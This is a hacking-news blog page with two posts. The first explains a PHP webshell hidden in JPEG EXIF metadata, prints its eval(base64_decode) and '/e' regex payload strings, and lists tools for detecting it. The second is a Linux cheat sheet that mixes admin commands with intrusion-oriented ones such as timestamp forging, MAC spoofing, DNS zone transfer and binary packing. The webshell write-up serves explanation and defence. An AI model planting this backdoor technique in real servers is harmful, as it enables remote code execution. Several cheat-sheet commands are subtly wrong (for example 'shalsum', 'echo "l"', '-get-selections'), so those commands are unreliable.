Here, you’ll find all the latest hacking news from around the world.

Thursday, January 28, 2021

WEBSHELL BACKDOOR CODE IN IMAGE FILES

STEGANOGRAPHY APPLIED FOR WEB EXPLOITATION


Before starting, let's introduce or refresh a couple of concepts that will come useful in order to fully understand later. 

Metadata 

As Wikipedia reports, metadata is "data that provides information about other data". In other words, it is "data about data" .

As an example, they are usually seen when we right-click on an image, under the 'Details' tab.





This metadata are called EXIF data, which stands for Exchangeable Image File Format. Most digital photo software can display EXIF information, but you usually can't edit it.

The Exif file format is the same as JPEG file format. Exif inserts some of the image/digital camera information data and thumbnail image to JPEG in conformity with JPEG specifications. Indeed, Exif format image files can be seen on Jpeg compliant Internet Browser, Picture viewer/Photo retouch software etc. as a usual JPEG image files.

As the title suggests, the Exit structure fields can be leveraged by an attacker for hiding malicious scripts. 


Consider a simple image like this one :





At first sight there's nothing suspicious, right?

Now, using a tool called exiftool(-k) a light tool downloadable from here, we can take a look at what it's hiding behind, in its metadata. 



Within the Exif data the are two suspicious entries, "copyright" and "document name", that contain respectively : 
/.*/e 
and 
eval(base64_decode(JF9QT1NUWydwYXNzd29yZCddKTs='));

"/.*/e" is known as PCTE regex modifier and it will be evaluate the data from $exif['Document Name']

How an attacker can use these scripts? 

Consider this PHP script :



The first line downloads the remote jpg image file with the stashes code in it and then sets the $exif variable with the array values. The variable will have this structure : 



The final setup in this process is to execute the PHP preg_replace function.

Notice that the $exif['Copyright'] variable data uses the "/.*/e" PCRE regex modifier (PREG_REPLACE_EVAL) which will evaluate the data from the $exif['DocumentName'] variable.


Knowing how it works and appears, how we can hunt it? 

There're many ways, tools and techniques that can be used. 
An example is this script, found on Pastebin that looks for the entries with UserComment, checking for the "/e" PCRE regex modifier. 




It the script finds that within the entry, it will output the name of the file to the console to alert us that the file is potentially dangerous.

 
Can also be used a tool called PHP Malware Finder available on GitHub.





PHP-malware-finder is a script used to detect obfuscated code, as well as files using PHP functions often used in web shells. Detection is performed by crawling the filesystem and testing files againsts a set of YARA rules. 

How not to mention Loki or Thor IOC scanner created by the awesome Nextron Systems, 
Their indicators can be derived from published incident reports, forensic analyses or malware sample collections.




 
Conclusions :

This is not a new technique but it's important to highlight that because today, for performance reasons, many organizations opt to only scan PHP files and exclude other file types from being scanned, overlooking certain types of file that shouldn't be classified as less important. 

Moreover, even though e ( PREG_REPLACE_EVAL ) was deprecated in PHP 5.5.0 and eventually removed as of PHP 7.0.0, this doesn't mean that the attack is still not prevalent. If the corporate environment is running PHP applications and it's not at the latest version of PHP, then, it's susceptible. 



References : 

https://www.media.mit.edu/pia/Research/deepview/exif.html
https://blog.sucuri.net/2013/07/malware-hidden-inside-jpg-exif-headers.html
https://www.php.net/manual/en/reference.pcre.pattern.modifiers.php

                                                                                                                                                    -G4d4r3L
Share:

Tuesday, January 5, 2021

linux cheat sheet



Everyone knows: cheat sheets are cool! They are very useful if you already know the basics about a topic but you have to look up details when you are not sure about something.

Especially, if you are new to a certain topic and you have to learn a lot of new stuff, it’s sometimes very hard to memorize everything.

Linux Network Commands
Command                                    Descriptions                                                                                  
                                                                      
watch ss -tp                               Network Connections             
netstat -ant                               Tcp Connections -anu=udp
netstat -tulpn                             Connection with PIDs
lsof -i                                    Established connections
smb://<ip>/share                           Access windows smb share
share user x.x.x.x c$                      Mount Windows share
smbclient -U user \\\\<ip>\\<share>        SMB connect
ifconfig eth# <ip>/<cidr>                  Set IP and netmask
route add default gw <gw_ip>               Set GW
ifconfig eth# mtu [size]                   Change MTU size
export MAC=xx:xx:xx:xx:xx:xx               change MAC
ifconfig <int> hw ether <MAC>              change Mac
macchanger -m <MAC> <int>                  kali Mac changer
iwlist <int> scan                          Built-in wifi scanner
dig -x <ip>                                Domain lookup for ip
host <ip>                                  Domain lookup for ip                                                                
host -t SRV _<server>_tcp.url.com          Domain SRV lookup                                                                                                   
dig @<ip> domain -t AXFR                   DNS Zone Xfer                                                                              
host -l <domain> <namesvr>                 DNS Zone Xfer                                                                                               
ip xfrm state list                         Print existing VPN keys                                                                                                                
ip addr add <ip>/<cidr> dev eth0           Adds 'hidden' interface                                                                                                
/var/log/messages | grep DHCP              List DHCP assignments                                                                        
tcpkill host <ip> and port <port>          Block ip:port                                          
echo "l" > /proc/sys/net/ipv4/ip_forward   Turn on IP Forwarding                                                                                                         
echo "nameserver x.x.x.x" > /etc/resolv.conf  Add DNS server                                                                         


Linux SYSTEM INFO
Command                                    Descriptions                                                                                  
                                                                      
nbtstat -A <ip>                            Get hostname for <ip>    
id                                         Current username
w                                          Logged on users
who -a                                     User information
last -a                                    Last users logged on
ps -ef                                     Process listing (top)
df -h                                      Disk usage (free)
uname -a                                   Kernel version/CPU info
mount                                      Mounted file systems
getent passwd                              show list of users
PATH=$PATH:/home/mypath                    Add to path variable
kill <pid>                                 Kills process with <pid>
cat /etc/issue                             Show OS info
cat /etc/*release*                         Show OS version info
cat /proc/version                          Show kernel info
rpm --query -all                           Installed pkgs (Redhat)                                                              
rpm -ivh * .rpm                            Install RPM (-e=remove)                                                                                              
dpkg -get-selections                       Installed pkgs (ubuntu)                                                                     
dpkg -I *.deb                              Install DEB (-r=remove)                                                        
pkginfo                                    Installed pkgs (Solaris)                                                                                                                
which <tscsh/csh/ksh/bash>                 Show location of executabe                                                                                                
chmod 750 <tcsh/csh/ksh>                   Disable <shell>, force bash                                                                        


Linux UTILITY COMMANDS

Command                                    Descriptions                                                                                  
                                                                      
wget http://<url> -O url.txt -o /dev/null  Grab url    
rdesktop <ip>                              Remote Desktop to <ip>
scp /tmp/file user@x.x.x.x:/tmp/file       Put file
scp user@<remoteip>:/tmp/file /tmp/file    User information
useradd -m <user>                          Add user
passwd <user>                              Change user password
rmuser uname                               Remove user
script -a <outfile>                        Record shell : Ctrl-D stops
apropos <subject>                          Find related command 
history                                    View users command history
!<num>                                     Executes line # in history

Linux FILE COMMANDS


Command                                    Descriptions                                                                                    
                                                                       
diff file1 file2                           Compare file                                                                                                
rm -rf <dir>                               Force delete of <dir>                                                                                  
shred -f -u <file>                         Overwrite/delete file
touch -r <ref_file> <file>                 Matches ref_file timestamp                                                                                                      
touch -t YYYYMMDDHHSS <file>               Set file timestamp             
sudo fdisk -l                              List connected drives
mount /dev/sda# /mnt/usbkey                Mount USB Key
md5sum -t file                             Compute md5 hash           
echo -n "str" | md5sum                     Generate md5 hash
shalsum file                               SHA1 hash of file                                          
sort -u                                    Sort/show unique lines                                                                           
grep -c "str" file                         Count lines w/ "str"  
tar cf file.tar files                      Creat .tar from files
tar xf file.tar                            Extract .tar                               
tar czf file.tar.gz files                  Creat .tar.gz
tar xzf file.tar.gz                        Extract .tar.gz                                                          
tar cjf file.tar.bz2 files                 Creat .tar.bz2                                                                                                    
tar xjf file.tar.bz2                       Extract .tar.bz2                                                                              
gzip file                                  Cmpress/rename file                                                                            
gzip -d file.gz                            Decompress file.gz                                                                         
upx -9 -o out.exe orig.exe                 UPX packs orig.exe                                                                                                 
zip -r <zipname.zip> \Directory\*          Creat zip                                                                          
dd skip=1000 count=2000 bs=8 if=file of=file    Cut block 1K-3K from file               
split -b 9K \<file> <prefix>               split file into 9k chunks                                                                 
awk 'sub("$"."\r")' unix.txt > win.txt     Win compatible txt file                                                      
find -i -name <file> -type *.pdf           Find PDF files                                                                     
find / -perm -4000 -o -perm -2000 -exec ls - ldb{} \;  search for setuid files
dos2unix <file>                            Convert to *nix format
file <file>                                Determine file type/info
chattr (+/-) i <file>                      Set/Unset immutable bit
Share:

Contact us

Name

Email *

Message *

Theme Support